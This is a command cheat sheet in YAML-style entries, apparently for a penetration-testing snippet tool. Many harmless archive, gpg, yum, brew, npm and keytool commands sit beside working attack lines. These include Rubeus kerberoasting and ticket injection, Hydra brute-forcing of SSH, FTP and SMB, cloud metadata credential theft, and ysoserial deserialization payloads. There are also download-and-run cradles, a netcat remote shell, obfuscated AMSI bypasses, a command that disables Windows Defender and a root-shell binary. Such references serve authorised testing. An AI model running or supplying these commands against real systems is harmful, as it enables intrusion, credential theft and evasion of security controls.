- cmd: rpcclient <ip> -U "<user>%<pass>" -c "enumdomgroups; quit"
lang: sh
tags: rpcclient, rpc, windows
desc: rpcclient - enumdomgroups (Enum Domain groups)
- cmd: rpcclient <ip> -U "<user>%<pass>" -c "querygroup <RID>; quit"
lang: sh
tags: rpcclient, rpc, windows
desc: rpcclient - querygroup (Enum Group Information)
- cmd: rpcclient <ip> -U "<user>%<pass>" -c "querygroupmem <RID>; quit"
lang: sh
tags: rpcclient, rpc, windows
desc: rpcclient - querygroupmem (Enum Group Membership)
- cmd: rpcclient <ip> -U "<user>%<pass>" -c "queryuser <RID>; quit"
lang: sh
tags: rpcclient, rpc, windows
desc: rpcclient - queryuser (Enumerate specific User/ computer information by RID)
- cmd: rpcclient <ip> -U "<user>%<pass>" -c "getusrdompwinfo <RID>; quit"
lang: sh
tags: rpcclient, rpc, windows
desc: rpcclient - getusrdompwinfo (User password policies)
- cmd: rpcclient <ip> -U "<user>%<pass>" -c "lsaenumsid; quit"
lang: sh
tags: rpcclient, rpc, windows
desc: rpcclient - lsaenumsid (Local Users LSA Enum SID)
- cmd: rpcclient <ip> -U "<user>%<pass>" -c "lookupsid <SID>; quit"
lang: sh
tags: rpcclient, rpc, windows
desc: rpcclient - lookupsid (Local Users Lookup SID)
- cmd: rpcclient <ip> -U "<user>%<pass>" -c "setuserinfo2 <LOGIN> 23 '<NEWPASSWORD>'; quit"
lang: sh
tags: rpcclient, rpc, windows
desc: rpcclient - setuserinfo2 (Reset AD user password)
- cmd: '.\Rubeus.exe ptt /ticket:<ticket>'
lang: ps1
tags: pentest
desc: ticket from file
- cmd: $data = (New-Object System.Net.WebClient).DownloadData('http://<lhost>/Rubeus.exe'); $assem = [System.Reflection.Assembly]::Load($data);
lang: ps1
tags: ad, windows, rubeus
desc: load rubeus from powershell
- cmd: '[Rubeus.Program]::MainString("klist");'
lang: ps1
tags: ad, windows, rubeus
desc: execute rubeus from powershell
- cmd: '.\Rubeus.exe monitor /interval:5 /filteruser:<machine_account>'
lang: ps1
tags: ad, windows, rubeus
desc: monitor
- cmd: '.\Rubeus.exe ptt /ticket:<BASE64BLOBHERE>; .\Rubeus.exe asreproast /format:<AS_REP_response_format> /outfile:<output_hashes_file>'
lang: ps1
tags: ad, windows, rubeus
desc: inject ticket from b64 blob
- cmd: '.\Rubeus.exe asreproast /user:<user> /domain:<domain_name> /format:<AS_REP_response_format> /outfile:<output_hashes_file>; .\Rubeus.exe kerberoast /outfile:<output_TGSs_file>'
lang: ps1
tags: ad, windows, rubeus
desc: ASREPRoast specific user
- cmd: '.\Rubeus.exe kerberoast /outfile:<output_TGSs_file> /domain:<domain_name>'
lang: ps1
tags: ad, windows, rubeus
desc: Kerberoasting and outputting on a file with a specific format
- cmd: '.\Rubeus.exe kerberoast /outfile:<output_TGSs_file> /domain:<domain_name> /rc4opsec'
lang: ps1
tags: ad, windows, rubeus
desc: Kerberoasting while being "OPSEC" safe, essentially while not try to roast AES enabled accounts
- cmd: '.\Rubeus.exe kerberoast /outfile:<output_TGSs_file> /domain:<domain_name> /aes'
lang: ps1
tags: ad, windows, rubeus
desc: Kerberoast AES enabled accounts
- cmd: '.\Rubeus.exe kerberoast /outfile:<output_TGSs_file> /domain:<domain_name> /user:<user> /simple'
lang: ps1
tags: ad, windows, rubeus
desc: Kerberoast specific user account
- cmd: '.\Rubeus.exe hash /user:<user> /domain:<domain_name> /password:<password>'
lang: ps1
tags: ad, windows, rubeus
desc: get hash
- cmd: .\Rubeus.exe dump
lang: sh
tags: ad, windows, rubeus
desc: dump - will dump any relevant cached TGS tickets stored
- cmd: '.\Rubeus.exe asktgt /user:<user> /domain:<domain_name> /rc4:<ntlm_hash> /ptt'
lang: sh
tags: ad, windows, rubeus
desc: ask and inject ticket
- cmd: '.\Rubeus.exe s4u /ticket:<ticket> /impersonateuser:<user> /msdsspn:ldap/<domain_fqdn> /altservice:cifs /ptt'
lang: sh
tags: ad, windows, rubeus
desc: S4U - with ticket - Constrained delegation
- cmd: '.\Rubeus.exe s4u /user:<user> /rc4:<NTLMhashedPasswordOfTheUser> /impersonateuser:<user_to_impersonate> /msdsspn:ldap/<domain_fqdn> /altservice:cifs /domain:<domain_name> /ptt'
lang: sh
tags: ad, windows, rubeus
desc: S4U - with hash - Constrained delegation
- cmd: '.\Rubeus.exe hash /password:<machine_password>'
lang: sh
tags: ad, windows, rubeus
desc: get rc4 of machine with the password
- cmd: '.\Rubeus.exe s4u /user:<MachineAccountName> /rc4:<RC4HashOfMachineAccountPassword> /impersonateuser:<user_to_impersonate> /msdsspn:cifs/<domain_fqdn> /domain:<domain_name> /ptt'
lang: sh
tags: ad, windows, rubeus
desc: S4U - Resource based constrained delegation
- cmd: $data = (New-Object System.Net.WebClient).DownloadData('http://<ip>/Rubeus.exe') ; $assem = [System.Reflection.Assembly]::Load($data); [Rubeus.Program]::Main("<rubeus_cmd>".Split())
lang: ps1
tags: ad, windows, rubeus
desc: Rubeus Reflection assembly
- cmd: 7z a <archive_name>.7z -p<password> <file>
lang: sh
tags: archive
desc: 7z create archive with password
- cmd: binwalk -Me <firmware_file>
lang: sh
tags: archive
desc: Recursively extract files from a firmware
- cmd: binwalk -E <firmware_file>
lang: sh
tags: archive
desc: Compute entropy of a firmware
- cmd: gzip <path>
lang: sh
tags: archive
desc: Compress file and appends .gz to its name
- cmd: gzip -d <gz_file>
lang: sh
tags: archive
desc: Decompress compressed file
- cmd: rar a <dir>
lang: sh
tags: pentest
desc: Compress dir to rar file
- cmd: unrar x <file>.rar
lang: sh
tags: pentest
desc: Decompress rar file
- cmd: tar cf <name>.tar <files>
lang: sh
tags: archive
desc: Create a tar containing files
- cmd: tar xf <tar_file>
lang: sh
tags: archive
desc: Extract the files from a tar
- cmd: tar czf <name>.tar.gz <files>
lang: sh
tags: archive
desc: Create a tar with Gzip compression
- cmd: tar xzf <targz_file>
lang: sh
tags: archive
desc: Extract a tar using Gzip
- cmd: unblob <firmware_file>
lang: sh
tags: archive
desc: Extract files from a firmware
- cmd: unblob --show-external-dependencies
lang: sh
tags: archive
desc: Show external dependencies
- cmd: zip <file>.zip <files_to_zip>
lang: sh
tags: archive, compress
desc: create zip file
- cmd: zip <file>.zip *
lang: sh
tags: archive, compress
desc: zip all the files of current directory
- cmd: zip -r <file>.zip <folder>
lang: sh
tags: archive, compress
desc: zip folder
- cmd: zip -u <file>.zip <file_to_add>
lang: sh
tags: archive, compress
desc: add file to a zip archive
- cmd: zipinfo <file>.zip
lang: sh
tags: archive, compress
desc: view zip content
- cmd: zip --symlinks <file>.zip <symlink_file>
lang: sh
tags: archive, compress
desc: create zip file with symlink (useful for path traversal)
- cmd: unzip -Z <file>.zip
lang: sh
tags: archive, compress
desc: list detailed zip file content
- cmd: unzip <file>.zip
lang: sh
tags: archive, compress
desc: unzip file
- cmd: unzip <file>.zip -d <destination_folder>
lang: sh
tags: archive, compress
desc: unzip file to directory
- cmd: hydra -L <userlist> -P <passlist> <ip> ssh
lang: bash
tags: bruteforce, access
desc: Hydra - ssh - userlist and password list - 22
- cmd: hydra -l <user|root> -p <password|root> <ip> ssh
lang: bash
tags: bruteforce, access
desc: Hydra - ssh - user and password - 22
- cmd: hydra -L <userlist> -e s <ip> ssh
lang: sh
tags: bruteforce, access
desc: Hydra - ssh - user=password - 22
- cmd: hydra -l <user|root> -e n <ip> ssh
lang: sh
tags: bruteforce, access
desc: Hydra - ssh - null password - 22
- cmd: hydra -L <userlist> -e r <ip> ssh
lang: sh
tags: bruteforce, access
desc: Hydra - ssh - password=reverseuser - 22
- cmd: hydra -t 4 -s <port> -C <file_login_pass> <ip> ssh
lang: sh
tags: bruteforce, access
desc: Hydra - ssh - file "login:pass" format - specify port
- cmd: hydra -L <userlist> -P <passlist> <ip> ftp
lang: sh
tags: bruteforce, access
desc: Hydra - ftp - 21
- cmd: hydra -L <userlist> -P <passlist> <ip> smb
lang: sh
tags: bruteforce, access
desc: Hydra - smb - 445
- cmd: hydra -L <userlist> -P <passlist> <ip> mysql
lang: sh
tags: bruteforce, access
desc: Hydra - mysql - 3306
- cmd: hydra -L <userlist> -P <passlist> <ip> vnc
lang: sh
tags: bruteforce, access
desc: Hydra - vnc - 5900
- cmd: hydra -L <userlist> -P <passlist> <ip> postgres
lang: sh
tags: bruteforce, access
desc: Hydra - postgres - 5432
- cmd: hydra -L <userlist> -P <passlist> <ip> telnet
lang: sh
tags: bruteforce, access
desc: Hydra - telnet - 23
- cmd: cewl -w <file|wordlist.txt> -d <deep|3> -m <min_word_size|5> <url>
lang: bash
tags: wordlist, bruteforce, dict
desc: cewl - wordlist creation
- cmd: crunch <min|2> <max|8> 0123456789ABCDEF -o <output.txt>
lang: bash
tags: wordlist, bruteforce, dict
desc: crunch - generate wordlist hex
- cmd: crunch <min> <max> -f /usr/share/crunch/charset.lst <charset|mixalpha-numeric> -o <output.txt>
lang: bash
tags: wordlist, bruteforce, dict
desc: crunch - generate wordlist charset
- cmd: crunch 8 8 -t <pattern|,@@@%%%^> -o <output.txt>
lang: bash
tags: wordlist, bruteforce, dict
desc: crunch - generate wordlist Upper(,) lower(@)x3 numeric(%)x3 special(^)x1
- cmd: crunch 8 8 -t password%%^ -o <output.txt>
lang: bash
tags: wordlist, bruteforce, dict
desc: crunch - generate wordlist contain "password", 2 numbers and 1 special char
- cmd: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
lang: sh
tags: aws
desc: SSRF in EC2 - List roles
- cmd: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role_name>
lang: sh
tags: aws
desc: SSRF in EC2 - Dump roles
- cmd: gpg --version
lang: sh
tags: gpg
desc: gpg version
- cmd: gpg --gen-key
lang: sh
tags: gpg
desc: gpg generate key
- cmd: gpg --list-keys
lang: sh
tags: gpg
desc: list keys
- cmd: gpg --keyserver <key_server> --send-keys <public_key>
lang: sh
tags: gpg
desc: distribute public key to key server
- cmd: gpg --output <filename_gpg> --export <key_name>
lang: sh
tags: gpg
desc: export public key
- cmd: gpg --import <filename_gpg>
lang: sh
tags: gpg
desc: import public key
- cmd: gpg --output <output_filename_gpg> --encrypt --recipient <public_key> <input_filename>
lang: sh
tags: gpg
desc: encrypt document
- cmd: gpg --output <filename> --decrypt <filename_gpg>
lang: sh
tags: gpg
desc: decrypt document
- cmd: gpg --output <filename_sig> --sign <filename>
lang: sh
tags: gpg
desc: make a signature
- cmd: gpg --output <filename> <filename> --decrypt <filename_sig>
lang: sh
tags: gpg
desc: verify signature
- cmd: gpg --clearsign <filename>
lang: sh
tags: gpg
desc: clearsign documents
- cmd: gpg --output <filename_sig> --detach-sig <filename>
lang: sh
tags: gpg
desc: detach signature
- cmd: redis-cli
lang: bash
tags: databases
desc: connect to the local server
- cmd: redis-cli -h <ip> -a <password>
lang: bash
tags: databases
desc: connect to a remote server on the default port (6379)
- cmd: redis-cli -h <ip> -p <port> -a <password>
lang: bash
tags: databases
desc: connect remotely specifying a port
- cmd: redis-cli -h <ip> --tls --cacert <redis_cert_path.pem>
lang: bash
tags: databases
desc: connect remotely over tls w/ server certificate
- cmd: redis-cli -h <ip> --tls --cacert <redis_cert_path.pem> --cert <redis_user_path.crt> --key <redis_user_private_path.key>
lang: bash
tags: databases
desc: connect remotely over tls w/ server & client certificates
- cmd: java -jar ysoserial.jar <lib_payload> 'powershell.exe -EncodedCommand <base64_encoded_command>' > <output_file>
lang: bash
tags: java, unserialize
desc: ysoserial java - generate payload
- cmd: iconv -f ASCII -t UTF-16LE <file_to_convert> | base64 | tr -d "\n"
lang: bash
tags: java, unserialize
desc: convert file to base64 one line
- cmd: ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -EncodedCommand <base64_encoded_command>" --path="<asp_file_webroot_relative_path>" --apppath="<application_path_webroot_relative>" --decryptionalg="3DES" --decryptionkey="<decryption_key>" --validationalg="SHA1" --validationkey="<validation_state>"
lang: ps1
tags: .net, unserialize
desc: ysoserial.net - generate payload VIEWSTATE
- cmd: ysoserial.exe -f <lib|Json.Net> -g <gadget|ObjectDataProvider> -o raw -c "<command|calc.exe>" -t
lang: ps1
tags: .net, unserialize
desc: ysoserial.net - calc.exe payload for Json.Net using ObjectDataProvider gadget.
- cmd: bitsadmin /Transfer myJob http://<ip>/<file|file.txt> <path|C:\windows\temp>
lang: sh
tags: pentest
desc: file with bitsadmin
- cmd: certutil.exe -urlcache -split -f http://<server>/<source_file> <dest_file>
lang: sh
tags: windows, certutil
desc: download with certutil
- cmd: certutil.exe -verifyctl -f -split h http://<server>/<source_file> <dest_file>
lang: sh
tags: windows, certutil
desc: download with certutil (2)
- cmd: certutil -decode enc.txt <file>
lang: sh
tags: windows, certutil
desc: Encode in base64 with certutil
- cmd: powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile "(New-Object System.Net.WebClient).DownloadFile('http://<server>/<source_file>','<dest_file>')"
lang: ps1
tags: powershell, download
desc: Download with powershell
- cmd: powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile New-Object System.Net.WebClient.DownloadFile('<url_file>','nc.exe'); nc.exe <ip> <port> -e cmd.exe
lang: ps1
tags: powershell, download
desc: Download and execute with powershell
- cmd: (new-object system.net.webclient).downloadstring('http://<ip>/<script>') | IEX
lang: ps1
tags: powershell, download
desc: Download cradle
- cmd: Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *
lang: ps1
tags: powershell, download
desc: Get file in trash
- cmd: Get-Process
lang: ps1
tags: powershell, download
desc: Get process
- cmd: '[System.Net.WebRequest]::DefaultWebProxy.GetProxy("http://<ip>/<url>")'
lang: ps1
tags: powershell, download
desc: Get Proxy
- cmd: $ExecutionContext.SessionState.LanguageMode
lang: ps1
tags: powershell, download
desc: Get language mode
- cmd: $a=[Ref].Assembly.GetTypes(); Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}}; $d=$c.GetFields('NonPublic,Static'); Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}}; $g=$f.GetValue($null); [IntPtr]$ptr=$g; [Int32[]]$buf = @(0); [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
lang: ps1
tags: powershell, download
desc: Bypass AMSI with _amsiContext_ (powershell only)
- cmd: $a=[Ref].Assembly.GetTypes(); Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}}; $d=$c.GetFields('NonPublic,Static'); Foreach($e in $d) {if ($e.Name -like "*InitFailed") {$f=$e}}; $f.SetValue($null,$true)
lang: ps1
tags: powershell, download
desc: Bypass AMSI with _AmsiInitFailed_ (powershell only)
- cmd: $ZQCUW = @"; using System; ; using System.Runtime.InteropServices; ; public class ZQCUW {; [DllImport("kernel32")]; public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); ; [DllImport("kernel32")]; public static extern IntPtr LoadLibrary(string name); ; [DllImport("kernel32")]; public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); ; }; "@; Add-Type $ZQCUW; $BBWHVWQ = [ZQCUW]::LoadLibrary("$([SYstem.Net.wEBUtIlITy]::HTmldecoDE('&#97; &#109; &#115; &#105; &#46; &#100; &#108; &#108; '))"); $XPYMWR = [ZQCUW]::GetProcAddress($BBWHVWQ, "$([systeM.neT.webUtility]::HtMldECoDE('&#65; &#109; &#115; &#105; &#83; &#99; &#97; &#110; &#66; &#117; &#102; &#102; &#101; &#114; '))"); $p = 0; [ZQCUW]::VirtualProtect($XPYMWR, [uint32]5, 0x40, [ref]$p); $TLML = "0xB8"; $PURX = "0x57"; $YNWL = "0x00"; $RTGX = "0x07"; $XVON = "0x80"; $WRUD = "0xC3"; $KTMJX = [Byte[]] ($TLML,$PURX,$YNWL,$RTGX,+$XVON,+$WRUD)[System.Runtime.InteropServices.Marshal]::Copy($KTMJX, 0, $XPYMWR, 6)
lang: ps1
tags: powershell, download
desc: Bypass AMSI by patching (work for .NET binaries too)
- cmd: Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"
lang: ps1
tags: powershell, download
desc: Verify PPL
- cmd: Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe
lang: ps1
tags: powershell, download
desc: Verify application whitelisting
- cmd: ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()
lang: ps1
tags: powershell, download
desc: show forest trust
- cmd: Get-DomainTrust -Domain <domain>
lang: ps1
tags: powershell, download
desc: Get domain trust
- cmd: Get-DomainSID -domain <sid>
lang: ps1
tags: powershell, download
desc: Get domain SID
- cmd: (new-object system.net.webclient).downloadstring('http://<lhost>/HostRecon.ps1') | IEX; Invoke-HostRecon
lang: sh
tags: powershell, download
desc: hostrecon
- cmd: (new-object system.net.webclient).downloadstring('http://<lhost>/PrivescCheck.ps1') | IEX; Invoke-PrivescCheck
lang: ps1
tags: powershell, download
desc: privesccheck
- cmd: '[appdomain]::currentdomain.getassemblies() | Sort-Object -Property fullname | Format-Table fullname'
lang: ps1
tags: powershell, download
desc: powershell view assemblies
- cmd: $proxyAddr=(Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings\").ProxyServer
lang: ps1
tags: powershell, download
desc: powershell get proxy address
- cmd: '[system.net.webrequest]::DefaultWebProxy = new-object System.Net.WebProxy("http://<proxaddress|$proxyAddr>")'
lang: ps1
tags: powershell, download
desc: powershell set proxy
- cmd: pwsh -Command '$text = "(New-Object System.Net.WebClient).DownloadString(''http://<lhost>/<file>'') | IEX"; $bytes = [System.Text.Encoding]::Unicode.GetBytes($text); $EncodedText = [Convert]::ToBase64String($bytes); $EncodedText'
lang: ps1
tags: powershell, download
desc: powershell - generate base64 encoded payload download runner
- cmd: Set-MpPreference -DisableRealtimeMonitoring $true
lang: ps1
tags: powershell, download
desc: powershell - disable Real Time Monitoring (Windows Defender)
- cmd: python -m SimpleHTTPServer <lport>
lang: bash
tags: server
desc: python Simple HTTP server
- cmd: python3 -m http.server <lport>
lang: bash
tags: server
desc: python3 Simple HTTP server
- cmd: php -S 0.0.0.0:<lport>
lang: sh
tags: server
desc: php Simple builtin server
- cmd: flashrom -p linux_spi:dev=<spidev>,spispeed=<spispeed> -r <output_file>
lang: sh
tags: pentest
desc: Read from linux (e.g. Raspberry Pi)
- cmd: flashrom -p linux_spi:dev=<spidev>,spispeed=<spispeed> -r <output_file> -f -c <chipname>
lang: sh
tags: pentest
desc: Force read from linux (e.g. Raspberry Pi)
- cmd: flashrom -p buspirate_spi:dev=<buspirate>,spispeed=<spispeed> -r <output_file>
lang: sh
tags: pentest
desc: Read from BusPirate
- cmd: flashrom -p buspirate_spi:dev=<buspirate>,spispeed=<spispeed> -r <output_file> -f -c <chipname>
lang: sh
tags: pentest
desc: Force read from BusPirate
- cmd: brew update
lang: sh
tags: mac, install
desc: update brew
- cmd: brew upgrade
lang: sh
tags: mac, install
desc: upgrade brew
- cmd: brew info <package>
lang: sh
tags: mac, install
desc: get info for a package
- cmd: brew cask info <casks>
lang: sh
tags: mac, install
desc: get info for a cask
- cmd: brew install <package>
lang: sh
tags: mac, install
desc: install a package
- cmd: brew cask install <casks>
lang: sh
tags: mac, install
desc: install a cask
- cmd: brew uninstall <installed>
lang: sh
tags: mac, install
desc: uninstall a package
- cmd: brew cask uninstall <caskinstalled>
lang: sh
tags: mac, install
desc: uninstall a cask
- cmd: brew edit <package>
lang: sh
tags: mac, install
desc: edit package
- cmd: brew cask edit <casks>
lang: sh
tags: mac, install
desc: edit cask
- cmd: yum list available
lang: sh
tags: yum
desc: List all available packages
- cmd: yum list installed
lang: sh
tags: yum
desc: List all installed packages
- cmd: yum info <package-name>
lang: sh
tags: yum
desc: Info about package
- cmd: yum search <query>
lang: sh
tags: yum
desc: Search in repository (packages and descriptions)
- cmd: yum history list
lang: sh
tags: yum
desc: List all history actions (install, update and erase)
- cmd: yum check-update
lang: sh
tags: yum
desc: Check updates for installed packages
- cmd: yum update
lang: sh
tags: yum
desc: Update all packages
- cmd: yum update <package-name>
lang: sh
tags: yum
desc: Update specific/individual package
- cmd: yum downgrade <package-name>
lang: sh
tags: yum
desc: Downgrade package
- cmd: yum install <package-name>
lang: sh
tags: yum
desc: Install a package from repository
- cmd: yum remove <package-name>
lang: sh
tags: yum
desc: Remove/delete package
- cmd: yum localinstall <filepath-rpm>
lang: sh
tags: yum
desc: Install local rpm package
- cmd: yum update --security
lang: sh
tags: yum
desc: Install security updates
- cmd: yum deplist <package-name>
lang: sh
tags: yum
desc: List dependencies of package
- cmd: yum autoremove
lang: sh
tags: yum
desc: Remove un-needed packages and dependencies
- cmd: yum whatprovides <query>
lang: sh
tags: yum
desc: Whatprovides package/file/binary
- cmd: yum repolist
lang: sh
tags: yum
desc: List currently enabled repositories
- cmd: keytool -genkey -alias <ALIAS> -keyalg RSA -keystore <OUTPUT_JKS> -keysize <RSA_LENGTH>
lang: sh
tags: java keytool, certificate, encryption
desc: Generate a Java keystore and key pair
- cmd: keytool -certreq -alias <ALIAS> -keystore <INPUT_JKS> -file <OUTPUT_CSR>
lang: sh
tags: java keytool, certificate, encryption
desc: Generate a certificate signing request (CSR) for an existing Java keystore
- cmd: keytool -import -trustcacerts -alias root -file <INPUT_CRT> -keystore <INPUT_JKS>
lang: sh
tags: java keytool, certificate, encryption
desc: Import a root or intermediate CA certificate to an existing Java keystore
- cmd: keytool -import -trustcacerts -alias <ALIAS> -file <INPUT_CRT> -keystore <INPUT_JKS>
lang: sh
tags: java keytool, certificate, encryption
desc: Import a signed primary certificate to an existing Java keystore
- cmd: keytool -genkey -keyalg RSA -alias <ALIAS> -keystore <OUTPUT_JKS> -storepass <PASSWORD> -validity <VALIDITY> -keysize <RSA_LENGTH>
lang: sh
tags: java keytool, certificate, encryption
desc: Generate a keystore and self-signed certificate
- cmd: keytool -printcert -v -file <INPUT_CRT>
lang: sh
tags: java keytool, certificate, encryption
desc: Check a stand-alone certificate
- cmd: keytool -list -v -keystore <INPUT_JKS>
lang: sh
tags: java keytool, certificate, encryption
desc: Check which certificates are in a Java keystore
- cmd: keytool -list -v -keystore <INPUT_JKS> -alias <ALIAS>
lang: sh
tags: java keytool, certificate, encryption
desc: Check a particular keystore entry using an alias
- cmd: keytool -delete -alias <ALIAS> -keystore <INPUT_JKS>
lang: sh
tags: java keytool, certificate, encryption
desc: Remove a certificate from a keystore
- cmd: keytool -storepasswd -keystore <INPUT_JKS> -new <NEW_PASSWORD>
lang: sh
tags: java keytool, certificate, encryption
desc: Change the password of a keystore
- cmd: keytool -export -alias <ALIAS> -file <OUTPUT_CRT> -keystore <INPUT_JKS>
lang: sh
tags: java keytool, certificate, encryption
desc: Export a certificate from a keystore
- cmd: keytool -list -v -keystore $JAVA_HOME/jre/lib/security/cacerts
lang: sh
tags: java keytool, certificate, encryption
desc: List the trusted CA Certs from the default Java Trusted Certs Keystore
- cmd: keytool -import -trustcacerts -file <INPUT_PEM> -alias <ALIAS> -keystore $JAVA_HOME/jre/lib/security/cacerts
lang: sh
tags: java keytool, certificate, encryption
desc: Import New Certificate Authority into the default Java Trusted Certs Keystore
- cmd: echo 'int main(void){setreuid(0,0); system("/bin/bash"); return 0; }' > pwn.c; ; gcc pwn.c -o <filename|shell>; ; rm pwn.c
lang: bash
tags: c, shell
desc: generate shell bash bin
- cmd: DotNetToJScript.exe <dll|ExampleAssembly.dll> --lang=Jscript --ver=v4 -o <jscript|runner.js>
lang: sh
tags: pentest
desc: DotNetToJScript
- cmd: npm init
lang: sh
tags: npm, node, js
desc: initial new package
- cmd: npm init -y
lang: sh
tags: npm, node, js
desc: initial immediately a new package
- cmd: npm install
lang: sh
tags: npm, node, js
desc: install all dependencies packages
- cmd: npm install --save-dev
lang: sh
tags: npm, node, js
desc: install all dev dependencies packages
- cmd: npm install <package_name>
lang: sh
tags: npm, node, js
desc: install a specified package
- cmd: npm install <package_name> --save-dev
lang: sh
tags: npm, node, js
desc: install a specified dev package
- cmd: npm install <package_name> -g
lang: sh
tags: npm, node, js
desc: install globally a specified package
- cmd: nvm install <version>
lang: sh
tags: nvm, node, js
desc: install a specified version of node
- cmd: nvm ls-remote
lang: sh
tags: nvm, node, js
desc: list available versions
- cmd: nvm use <version>
lang: sh
tags: nvm, node, js
desc: use installed node's version
- cmd: nvm alias default <version>
lang: sh
tags: nvm, node, js
desc: set a node's version as default
- cmd: grep -rn --include "*.js" -e "^\(.*\s\|.*child_process.*|\)\(exec\|spawn\|eval\|execSync\|spawnSync\|execFileSync\)(" --color
lang: sh
tags: whitebox, nodejs
desc: command execution
- cmd: grep -rn --include "*.js" -e "^\(.*\s\|\)\(require\)(" --color; grep -rn --include "*.js" -e "^\(.*\s\|\)\(appendFile\|open\|readFile\|WriteFile\\|unlink\|rename\|formidable)(" --color; grep -rn --include "*.js" -e "unserialize(" --color
lang: sh
tags: whitebox, nodejs
desc: require
- cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)\(include\|require\|virtual\|require_once\|include_once\)\(\s\|(\).*\\$" --color
lang: sh
tags: php, whitebox
desc: php grep include
- cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)\(readfile\|file_get_contents\|stream_get_contents\|show_source\|fopen\|file\|fpassthru\|gzopen\|gzfile\|gzpassthru\|readgzfile\)\(\s\|(\).*\\$" --color
lang: sh
tags: php, whitebox
desc: php grep path traversal
- cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)\(eval\|popen\|pcntl_exec\|assert\|proc_open\|create_function\|call_user_func\|call_user_func_array\|exec\|shell_exec\|system\|passthru\|virtual\)([^)]*\\$" --color
lang: sh
tags: php, whitebox
desc: php grep exec
- cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)\(preg_replace\|ereg_replace\|eregi_replace\|mb_ereg_replace\|mb_eregi_replace\)(.*\\$" --color
lang: sh
tags: php, whitebox
desc: php grep replace
- cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)unserialize(.*\\$" --color
lang: sh
tags: php, whitebox
desc: php grep unserialize
- cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)ldap_search(.*\\$" --color
lang: sh
tags: php, whitebox
desc: php grep ldap
- cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)xpath.*\\$" --color
lang: sh
tags: php, whitebox
desc: php grep xpath
- cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)mail(.*\\$" --color
lang: sh
tags: php, whitebox
desc: php grep mail
- cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)\(echo\|printf\|print\)\(\s\|(\).*\\$" --color
lang: sh
tags: php, whitebox
desc: php grep echo
- cmd: grep -rn --include "*.php" -e "\(\\\$[^=]\|0\)\s*==\s*\(0\|\\\$[^=]\\)" --color
lang: sh
tags: php, whitebox
desc: php grep weak comparison
- cmd: grep -rn --include "*.php" -e "\(\$_GET\|\$_POST\|\$_FILES\|\$REQUEST\|\$_COOKIES\|\$_SESSION\|\$_SERVER\|\$_GLOBALS\)" --color
lang: sh
tags: php, whitebox
desc: php grep entry points
- cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)\(ob_start\|array_diff_uassoc\|array_diff_ukey\|array_filter\|array_intersect_uassoc\|array_intersect_ukey\|array_map\|array_reduce\|array_udiff_assoc\|array_udiff_uassoc\|array_udiff\|array_uintersect_assoc\|array_uintersect_uassoc\|array_uintersect\|array_walk_recursive\|array_walk\|assert_options\|uasort\|uksort\|usort\|preg_replace_callback\|spl_autoload_register\|iterator_apply\|register_shutdown_function\|register_tick_function\|set_error_handler\|set_exception_handler\|session_set_save_handler\|sqlite_create_aggregate\|sqlite_create_function\)(.*\\$"
lang: sh
tags: php, whitebox
desc: php grep callbacks
- cmd: grep -rn --include "*.php" -e "curl_exec" --color
lang: sh
tags: php, whitebox
desc: php grep curl
- cmd: grep -rni --include "*.php" -e "\(where\|query\).*\\$"
lang: sh
tags: php, whitebox
desc: php grep where or query
- cmd: for f in *.php; do grep "/include/auth.php" $f || echo $f; done |grep -v include | grep -v require
lang: sh
tags: php, whitebox
desc: php grep file not contain an auth file include
- cmd: curl <url>?<param>=php://filter/read=convert.base64-encode/resource=<file>.php
lang: sh
tags: php, whitebox
desc: php wrapper lfi
- cmd: crontab -l
lang: sh
tags: crontab, schedule
desc: List cron jobs
- cmd: crontab -e
lang: sh
tags: crontab, schedule
desc: Edit cron job
- cmd: grep <word> <file>
lang: sh
tags: pentest
desc: grep classic
- cmd: grep -i <word> <file>
lang: sh
tags: pentest
desc: grep without case
- cmd: grep <word> <file> -H
lang: sh
tags: pentest
desc: grep with file found
- cmd: grep -rn --include "*.<extension>" <word>
lang: sh
tags: pentest
desc: grep recursive on extension
- cmd: grep -e "\(<word_A>\|<word_B>\)" <file>
lang: sh
tags: pentest
desc: grep word A or B
- cmd: egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{32}' > md5-hashes.txt
lang: sh
tags: pentest
desc: Extract md5 hashes ({32})
- cmd: egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{40}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{40}' > sha1-hashes.txt
lang: sh
tags: pentest
desc: Extract sha1 ({40})
- cmd: egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{64}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{64}' > sha256-hashes.txt
lang: sh
tags: pentest
desc: Extract sha256({64})
